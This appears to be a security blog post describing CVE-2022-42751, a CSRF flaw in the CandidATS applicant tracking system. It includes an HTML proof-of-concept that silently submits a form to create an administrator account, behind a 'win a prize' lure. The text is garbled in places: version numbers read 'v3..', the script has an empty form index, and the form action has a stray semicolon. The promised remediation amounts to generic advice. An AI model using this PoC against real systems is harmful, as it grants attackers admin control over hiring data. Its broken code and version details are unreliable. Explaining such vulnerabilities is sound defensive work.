CVE-2022-42751: Critical Privilege Escalation in CandidATS (v3..) Leveraging CSRF Vulnerabilities - Exploit Details, PoC, and Remediation

CandidATS, a popular open-source Applicant Tracking System (ATS) is reportedly affected by a high-impact Critical Privilege Escalation vulnerability (CVE-2022-42751) found in version 3... The vulnerability is a result of improper handling of Cross-Site Request Forgery (CSRF) protection mechanisms in the application. It allows an external attacker to manipulate a system administrator into creating a new user account with administrative privileges, consequently compromising the system and accessing sensitive information. This blog post will walk you through the importance of the vulnerability, the exploit details, example code snippets, and links to original references.

What is CSRF Vulnerability?

Cross-Site Request Forgery (CSRF) is a security vulnerability that allows an attacker to execute unintended actions on behalf of authenticated users in web applications. The vulnerability is often exploited by persuading users to click on malicious links or visit websites that are compromised by an attacker. These actions can be destructive or benign, but when administrative users are targeted, the impact can be severe and cause significant harm to an organization.

Exploit Details - CVE-2022-42751

The CVE-2022-42751 vulnerability in CandidATS (v3..) specifically affects the user creation process in the application. It allows an attacker to deceive an authenticated administrative user and persuade them to create a new user account with administrative permissions, using a crafted HTTP request containing the attacker's desired user information.

Here's a code snippet of the CSRF exploit (PoC), showcasing the attack vector in HTML format

<!DOCTYPE html>
<html>
<head>
  <title>CVE-2022-42751 PoC</title>
</head>
<body>
  <form action="http://CANDIDATS_URL/user/create"; method="POST">
    <input type="hidden" name="username" value="attacker" />
    <input type="hidden" name="password" value="attacker123" />
    <input type="hidden" name="email" value="attacker@example.com" />
    <input type="hidden" name="role" value="admin" />
    <input type="submit" value="Click Here to Win a Prize!" />
  </form>
  
  <script>
    document.forms[].submit();
  </script>
</body>
</html>

In this PoC, when an authenticated administrative user clicks on the link (or visits a malicious website hosting the CSRF exploit), the JavaScript code embedded in the page automatically submits a form POST request to the /user/create endpoint without any user interaction. The attack request creates a new user account ('attacker') with administrative privileges.

Original References & Resources

1. MITRE CVE Entry: CVE-2022-42751
2. NIST NVD: CVE-2022-42751 Detail
3. CandidATS Official GitHub Repository: https://github.com/auielementblue/CandidATS

Conclusion

CVE-2022-42751 represents a severe security risk in CandidATS (v3..) that can lead to unauthorized access and data breach incidents if not addressed promptly. It is highly recommended for system administrators and users to incorporate proper security measures against CSRF vulnerabilities and stay vigilant against potential attacks. By understanding and implementing necessary precautions, organizations can safeguard their critical data and maintain a secure environment.

Timeline

Published on: 11/03/2022 18:15:00 UTC
Last modified on: 11/04/2022 15:12:00 UTC